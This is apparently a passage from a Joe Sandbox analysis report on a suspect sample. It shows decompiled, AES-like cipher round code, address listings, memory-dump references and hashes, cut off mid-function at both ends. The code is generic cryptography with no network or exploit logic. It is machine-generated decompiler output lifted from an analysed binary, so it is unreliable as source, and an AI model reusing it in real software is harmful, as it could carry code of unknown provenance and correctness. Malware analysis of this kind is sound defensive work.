							_t699 = _t1169[2] ^  *(0xfc6c240 + (_t814 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t693 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t618 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t849 & 0x000000ff) * 4);
							_t824 = _t1169[3] ^  *(0xfc6c240 + (_t848 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t814 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t618 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t696 & 0x000000ff) * 4);
							_t998 =  *_t1181;
							_t514 =  *(0xfc6ca40 + (_t815 & 0x000000ff) * 4) ^  *(0xfc6c240 + (_t695 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t848 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
							_t628 =  *(0xfc6c240 + (_t693 & 0x000000ff) * 4) ^  *(0xfc6c640 + (_t695 & 0x000000ff) * 4) ^  *(0xfc6ce40 + (_t815 & 0x000000ff) * 4) ^  *(0xfc6ca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
							goto L5;
						} else {
							_t595 = 0xffffffff;
						}
					}
				}
				return _t595;
			}












































































































































                                        0x0fc61c23
                                        0x0fc61c27
                                        0x0fc61c2b
                                        0x0fc61c2f
                                        0x0fc61c33
                                        0x0fc61c45
                                        0x0fc61c49
                                        0x0fc61c50
                                        0x0fc61c53
                                        0x0fc61c56
                                        0x0fc61c59
                                        0x0fc61c62
                                        0x0fc61fce
                                        0x0fc61fce
                                        0x0fc61fd1
                                        0x0fc61fda
                                        0x0fc6202c
                                        0x0fc6202e
                                        0x0fc62063
                                        0x0fc62066
                                        0x0fc62093
                                        0x0fc62095
                                        0x0fc62097
                                        0x0fc6209a
                                        0x0fc6209d
                                        0x0fc620a0
                                        0x0fc620a3
                                        0x0fc620ac
                                        0x0fc620fe
                                        0x0fc62100
                                        0x0fc62135
                                        0x0fc62138
                                        0x0fc62165
                                        0x0fc62167
                                        0x0fc62169
                                        0x0fc6216c
                                        0x0fc6216f
                                        0x0fc62172
                                        0x0fc62175
                                        0x0fc6217e
                                        0x0fc621d0
                                        0x0fc621d2
                                        0x0fc62207
                                        0x0fc6220a
                                        0x0fc62237
                                        0x0fc62239
                                        0x0fc6223b
                                        0x0fc6223e
                                        0x0fc62241
                                        0x0fc62244
                                        0x0fc62247
                                        0x0fc62250
                                        0x0fc622a2
                                        0x0fc622a4
                                        0x0fc622d9
                                        0x0fc622dc
                                        0x0fc62309
                                        0x0fc6230b
                                        0x0fc6230d
                                        0x0fc62310
                                        0x0fc62313
                                        0x0fc62316
                                        0x0fc62319
                                        0x0fc62322
                                        0x0fc62374
                                        0x0fc62376
                                        0x0fc623ab
                                        0x0fc623ae
                                        0x0fc623db
                                        0x0fc623dd
                                        0x0fc623df
                                        0x0fc623e2
                                        0x0fc623e5
                                        0x0fc623e8
                                        0x0fc623eb
                                        0x0fc623f4
                                        0x0fc62446
                                        0x0fc62448
                                        0x0fc6247d
                                        0x0fc62480
                                        0x0fc624ad
                                        0x0fc624af
                                        0x0fc624b1
                                        0x0fc624b4
                                        0x0fc624b7
                                        0x0fc624ba
                                        0x0fc624bd
                                        0x0fc624c6
                                        0x0fc62518
                                        0x0fc6251a
                                        0x0fc6254f
                                        0x0fc62552
                                        0x0fc6257f
                                        0x0fc62581
                                        0x0fc62583
                                        0x0fc62586
                                        0x0fc62589
                                        0x0fc6258c
                                        0x0fc6258f
                                        0x0fc62598
                                        0x0fc625ea
                                        0x0fc625ec
                                        0x0fc62621
                                        0x0fc62624
                                        0x0fc62651
                                        0x0fc62653
                                        0x0fc62655
                                        0x0fc62658
                                        0x0fc6265b
                                        0x0fc6265e
                                        0x0fc62661
                                        0x0fc6266a
                                        0x0fc626bc
                                        0x0fc626be
                                        0x0fc626f3
                                        0x0fc626f6
                                        0x0fc62723
                                        0x0fc62725
                                        0x0fc62727
                                        0x0fc6272a
                                        0x0fc6272d
                                        0x0fc62730
                                        0x0fc62733
                                        0x0fc6273c
                                        0x0fc6278e
                                        0x0fc62790
                                        0x0fc627c5
                                        0x0fc627c8
                                        0x0fc627f5
                                        0x0fc627fe
                                        0x0fc62802
                                        0x0fc62805
                                        0x0fc62808
                                        0x0fc6280b
                                        0x0fc6280e
                                        0x0fc61c68
                                        0x0fc61c6e
                                        0x0fc61e2a
                                        0x0fc61e2a
                                        0x0fc61e2d
                                        0x0fc61e36
                                        0x0fc61e88
                                        0x0fc61e8a
                                        0x0fc61ebf
                                        0x0fc61ec2
                                        0x0fc61eef
                                        0x0fc61ef1
                                        0x0fc61ef3
                                        0x0fc61ef6
                                        0x0fc61ef9
                                        0x0fc61efc
                                        0x0fc61eff
                                        0x0fc61f08
                                        0x0fc61f5a
                                        0x0fc61f5c
                                        0x0fc61f91
                                        0x0fc61f94
                                        0x0fc61fc1
                                        0x0fc61fc3
                                        0x0fc61fc5
                                        0x0fc61fc8
                                        0x0fc61fcb
                                        0x00000000
                                        0x0fc61c74
                                        0x0fc61c7a
                                        0x0fc61c86
                                        0x0fc61c89
                                        0x0fc61c92
                                        0x0fc61ce4
                                        0x0fc61ce6
                                        0x0fc61d1b
                                        0x0fc61d1e
                                        0x0fc61d4b
                                        0x0fc61d4d
                                        0x0fc61d4f
                                        0x0fc61d52
                                        0x0fc61d55
                                        0x0fc61d58
                                        0x0fc61d5b
                                        0x0fc61d64
                                        0x0fc61db6
                                        0x0fc61db8
                                        0x0fc61ded
                                        0x0fc61df0
                                        0x0fc61e1d
                                        0x0fc61e1f
                                        0x0fc61e21
                                        0x0fc61e24
                                        0x0fc61e27
                                        0x00000000
                                        0x0fc61c7c
                                        0x0fc61c7c
                                        0x0fc61c7c
                                        0x0fc61c7a
                                        0x0fc61c6e
                                        0x0fc62823

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd8267fb1c1cfda638be47f7c74b44d4a61a09b784c2d868b0395b96607fdbff
                                        • Instruction ID: 5bf6f5cee82c2228139090f8a3e4c425d2874f8e4403cf0b6012c78e46d7cce1
                                        • Opcode Fuzzy Hash: fd8267fb1c1cfda638be47f7c74b44d4a61a09b784c2d868b0395b96607fdbff
                                        • Instruction Fuzzy Hash: 61723271C142E98FDB80EF6FE49613673A1EB50323B47852AEFC15B191D638B630AB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC61020 Relevance: .7, Instructions: 720COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E0FC61020(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t513;
				signed char _t515;
				signed char _t516;
				signed char _t518;
				signed char _t520;
				signed char _t521;
				signed char _t523;
				signed char _t525;
				signed char _t526;
				signed char _t528;
				signed char _t530;
				signed char _t531;
				signed char _t533;
				signed char _t535;
				signed char _t536;
				signed char _t538;
				signed char _t540;
				signed char _t541;
				signed char _t543;
				signed char _t545;
				signed char _t546;
				signed char _t548;
				signed char _t550;
				signed char _t551;
				signed char _t553;
				signed char _t555;
				signed char _t556;
				signed char _t558;
				signed char _t560;
				signed char _t561;
				void* _t564;
				signed char _t566;
				signed char _t567;
				signed char _t569;
				signed char _t571;
				signed char _t572;
				signed char _t575;
				signed char _t576;
				signed char _t578;
				signed char _t580;
				signed char _t581;
				signed int _t585;
				signed char _t594;
				signed char _t603;
				signed char _t612;
				signed char _t621;
				signed char _t630;
				signed char _t639;
				signed char _t648;
				signed char _t657;
				signed char _t666;
				signed char _t685;
				signed char _t702;
				signed int _t712;
				signed char _t713;
				signed char _t714;
				signed char _t715;
				signed char _t716;
				signed char _t717;
				signed char _t718;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed char _t722;
				signed char _t723;
				signed char _t724;
				signed char _t725;
				signed char _t726;
				signed char _t727;
				signed char _t728;
				signed char _t729;
				signed char _t730;
				signed char _t731;
				signed char _t732;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed char _t736;
				signed char _t737;
				signed int _t739;
				signed char _t740;
				signed char _t747;
				signed char _t748;
				signed char _t755;
				signed char _t756;
				signed char _t763;
				signed char _t764;
				signed char _t771;
				signed char _t772;
				signed char _t779;
				signed char _t780;
				signed char _t787;
				signed char _t788;
				signed char _t795;
				signed char _t796;
				signed char _t803;
				signed char _t804;
				signed char _t811;
				signed char _t812;
				signed int* _t819;
				signed char _t820;
				signed char _t827;
				signed char _t828;
				signed char _t835;
				signed char _t842;
				signed char _t843;
				signed int _t851;
				signed int* _t924;
				signed int* _t996;
				signed int* _t997;
				signed int* _t998;
				signed int* _t1010;
				signed int* _t1011;
				signed int* _t1023;
				signed int* _t1024;
				signed int* _t1036;
				signed int* _t1037;
				signed int* _t1049;
				signed int* _t1050;
				signed int* _t1062;
				signed int* _t1063;
				signed int* _t1075;
				signed int* _t1076;
				signed int* _t1088;
				signed int* _t1089;
				signed int* _t1101;
				signed int* _t1102;
				signed int* _t1114;
				signed int* _t1115;
				signed int* _t1127;
				signed int* _t1129;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1154;
				signed int* _t1166;
				signed int* _t1167;
				signed int** _t1179;

				_t1179[4] = _t996;
				_t1179[3] = __ebx;
				_t1179[2] = __esi;
				_t1179[1] = __edi;
				_t924 = _t1179[6];
				_t997 = _t1179[8];
				_t851 = _t997[0x3c] & 0x000000ff;
				_t513 =  *_t924 ^  *_t997;
				_t585 = _t924[1] ^ _t997[1];
				_t712 = _t924[2] ^ _t997[2];
				_t739 = _t924[3] ^ _t997[3];
				if(_t851 == 0xa0) {
					L6:
					_t998 =  &(_t997[4]);
					 *_t1179 = _t998;
					asm("rol ebx, 0x10");
					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
					_t740 = _t739 >> 0x10;
					_t516 = _t515 >> 0x10;
					_t713 = _t712 >> 0x10;
					_t714 = _t998[2] ^  *(0xfc6a240 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t516 & 0x000000ff) * 4);
					_t747 = _t998[3] ^  *(0xfc6a240 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t713 & 0x000000ff) * 4);
					_t1010 =  *_t1179;
					_t518 =  *(0xfc6a240 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t515 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t740 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
					_t594 =  *(0xfc6aa40 + (_t740 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t515 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
					_t1011 =  &(_t1010[4]);
					 *_t1179 = _t1011;
					asm("rol ebx, 0x10");
					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
					_t748 = _t747 >> 0x10;
					_t521 = _t520 >> 0x10;
					_t715 = _t714 >> 0x10;
					_t716 = _t1011[2] ^  *(0xfc6a240 + (_t714 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t747 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t594 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t521 & 0x000000ff) * 4);
					_t755 = _t1011[3] ^  *(0xfc6a240 + (_t747 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t518 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t594 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t715 & 0x000000ff) * 4);
					_t1023 =  *_t1179;
					_t523 =  *(0xfc6a240 + (_t518 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t520 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t748 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
					_t603 =  *(0xfc6aa40 + (_t748 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t714 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t520 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
					_t1024 =  &(_t1023[4]);
					 *_t1179 = _t1024;
					asm("rol ebx, 0x10");
					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
					_t756 = _t755 >> 0x10;
					_t526 = _t525 >> 0x10;
					_t717 = _t716 >> 0x10;
					_t718 = _t1024[2] ^  *(0xfc6a240 + (_t716 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t755 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t526 & 0x000000ff) * 4);
					_t763 = _t1024[3] ^  *(0xfc6a240 + (_t755 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t523 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t603 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t717 & 0x000000ff) * 4);
					_t1036 =  *_t1179;
					_t528 =  *(0xfc6a240 + (_t523 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t525 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t756 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
					_t612 =  *(0xfc6aa40 + (_t756 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t716 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t525 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
					_t1037 =  &(_t1036[4]);
					 *_t1179 = _t1037;
					asm("rol ebx, 0x10");
					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
					_t764 = _t763 >> 0x10;
					_t531 = _t530 >> 0x10;
					_t719 = _t718 >> 0x10;
					_t720 = _t1037[2] ^  *(0xfc6a240 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t612 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t531 & 0x000000ff) * 4);
					_t771 = _t1037[3] ^  *(0xfc6a240 + (_t763 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t528 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t612 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t719 & 0x000000ff) * 4);
					_t1049 =  *_t1179;
					_t533 =  *(0xfc6a240 + (_t528 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t764 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
					_t621 =  *(0xfc6aa40 + (_t764 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t718 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t530 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
					_t1050 =  &(_t1049[4]);
					 *_t1179 = _t1050;
					asm("rol ebx, 0x10");
					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t536 = _t535 >> 0x10;
					_t721 = _t720 >> 0x10;
					_t722 = _t1050[2] ^  *(0xfc6a240 + (_t720 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t621 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t536 & 0x000000ff) * 4);
					_t779 = _t1050[3] ^  *(0xfc6a240 + (_t771 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t533 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t621 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t721 & 0x000000ff) * 4);
					_t1062 =  *_t1179;
					_t538 =  *(0xfc6a240 + (_t533 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t535 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
					_t630 =  *(0xfc6aa40 + (_t772 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t720 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t535 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
					_t1063 =  &(_t1062[4]);
					 *_t1179 = _t1063;
					asm("rol ebx, 0x10");
					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
					_t780 = _t779 >> 0x10;
					_t541 = _t540 >> 0x10;
					_t723 = _t722 >> 0x10;
					_t724 = _t1063[2] ^  *(0xfc6a240 + (_t722 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t779 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t541 & 0x000000ff) * 4);
					_t787 = _t1063[3] ^  *(0xfc6a240 + (_t779 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t630 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t723 & 0x000000ff) * 4);
					_t1075 =  *_t1179;
					_t543 =  *(0xfc6a240 + (_t538 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t540 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
					_t639 =  *(0xfc6aa40 + (_t780 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t722 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t540 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
					_t1076 =  &(_t1075[4]);
					 *_t1179 = _t1076;
					asm("rol ebx, 0x10");
					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
					_t788 = _t787 >> 0x10;
					_t546 = _t545 >> 0x10;
					_t725 = _t724 >> 0x10;
					_t726 = _t1076[2] ^  *(0xfc6a240 + (_t724 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t787 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t639 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t546 & 0x000000ff) * 4);
					_t795 = _t1076[3] ^  *(0xfc6a240 + (_t787 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t543 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t639 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t725 & 0x000000ff) * 4);
					_t1088 =  *_t1179;
					_t548 =  *(0xfc6a240 + (_t543 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t545 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t788 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
					_t648 =  *(0xfc6aa40 + (_t788 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t724 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t545 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
					_t1089 =  &(_t1088[4]);
					 *_t1179 = _t1089;
					asm("rol ebx, 0x10");
					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
					_t796 = _t795 >> 0x10;
					_t551 = _t550 >> 0x10;
					_t727 = _t726 >> 0x10;
					_t728 = _t1089[2] ^  *(0xfc6a240 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t795 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t551 & 0x000000ff) * 4);
					_t803 = _t1089[3] ^  *(0xfc6a240 + (_t795 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t548 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t648 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t727 & 0x000000ff) * 4);
					_t1101 =  *_t1179;
					_t553 =  *(0xfc6a240 + (_t548 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t550 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t796 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
					_t657 =  *(0xfc6aa40 + (_t796 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t726 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t550 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
					_t1102 =  &(_t1101[4]);
					 *_t1179 = _t1102;
					asm("rol ebx, 0x10");
					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
					_t804 = _t803 >> 0x10;
					_t556 = _t555 >> 0x10;
					_t729 = _t728 >> 0x10;
					_t730 = _t1102[2] ^  *(0xfc6a240 + (_t728 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t803 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t657 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t556 & 0x000000ff) * 4);
					_t811 = _t1102[3] ^  *(0xfc6a240 + (_t803 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t553 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t657 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t729 & 0x000000ff) * 4);
					_t1114 =  *_t1179;
					_t558 =  *(0xfc6a240 + (_t553 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t555 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t804 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
					_t666 =  *(0xfc6aa40 + (_t804 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t728 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t555 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
					_t1115 =  &(_t1114[4]);
					 *_t1179 = _t1115;
					asm("rol ebx, 0x10");
					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
					_t812 = _t811 >> 0x10;
					_t561 = _t560 >> 0x10;
					_t731 = _t730 >> 0x10;
					_t1127 =  *_t1179;
					_t819 = _t1179[7];
					 *_t819 =  *(0xfc6b240 + (_t558 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t560 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t812 & 0x000000ff) * 4) ^  *(0xfc6ba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
					_t819[1] =  *(0xfc6ba40 + (_t812 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t730 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t560 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
					_t819[2] = _t1115[2] ^  *(0xfc6b240 + (_t730 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t811 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t666 & 0x000000ff) * 4) ^  *(0xfc6ba40 + (_t561 & 0x000000ff) * 4);
					_t819[3] = _t1115[3] ^  *(0xfc6b240 + (_t811 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_t558 & 0x000000ff) * 4) ^  *(0xfc6ba40 + (_t666 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t731 & 0x000000ff) * 4);
					_t564 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1129 =  &(_t997[4]);
						 *_t1179 = _t1129;
						asm("rol ebx, 0x10");
						_t566 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
						_t820 = _t739 >> 0x10;
						_t567 = _t566 >> 0x10;
						_t732 = _t712 >> 0x10;
						_t733 = _t1129[2] ^  *(0xfc6a240 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t567 & 0x000000ff) * 4);
						_t827 = _t1129[3] ^  *(0xfc6a240 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t732 & 0x000000ff) * 4);
						_t1141 =  *_t1179;
						_t569 =  *(0xfc6a240 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t566 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t820 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t732 & 0x000000ff) * 4) ^  *_t1141;
						_t685 =  *(0xfc6aa40 + (_t820 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t566 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t567 & 0x000000ff) * 4) ^ _t1141[1];
						_t1142 =  &(_t1141[4]);
						 *_t1179 = _t1142;
						asm("rol ebx, 0x10");
						_t571 = _t569 & 0xffff0000 | _t685 >> 0x00000010;
						_t828 = _t827 >> 0x10;
						_t572 = _t571 >> 0x10;
						_t734 = _t733 >> 0x10;
						_t712 = _t1142[2] ^  *(0xfc6a240 + (_t733 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t827 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t685 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t572 & 0x000000ff) * 4);
						_t739 = _t1142[3] ^  *(0xfc6a240 + (_t827 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t569 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t685 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t734 & 0x000000ff) * 4);
						_t997 =  *_t1179;
						_t513 =  *(0xfc6a240 + (_t569 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t571 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t734 & 0x000000ff) * 4) ^  *_t997;
						_t585 =  *(0xfc6aa40 + (_t828 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t733 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t571 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t572 & 0x000000ff) * 4) ^ _t997[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1154 =  &(_t997[4]);
							 *_t1179 = _t1154;
							asm("rol ebx, 0x10");
							_t575 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
							_t835 = _t739 >> 0x10;
							_t576 = _t575 >> 0x10;
							_t735 = _t712 >> 0x10;
							_t736 = _t1154[2] ^  *(0xfc6a240 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t576 & 0x000000ff) * 4);
							_t842 = _t1154[3] ^  *(0xfc6a240 + (_t739 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t735 & 0x000000ff) * 4);
							_t1166 =  *_t1179;
							_t578 =  *(0xfc6a240 + (_t513 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t575 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t835 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t735 & 0x000000ff) * 4) ^  *_t1166;
							_t702 =  *(0xfc6aa40 + (_t835 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t712 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t575 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t576 & 0x000000ff) * 4) ^ _t1166[1];
							_t1167 =  &(_t1166[4]);
							 *_t1179 = _t1167;
							asm("rol ebx, 0x10");
							_t580 = _t578 & 0xffff0000 | _t702 >> 0x00000010;
							_t843 = _t842 >> 0x10;
							_t581 = _t580 >> 0x10;
							_t737 = _t736 >> 0x10;
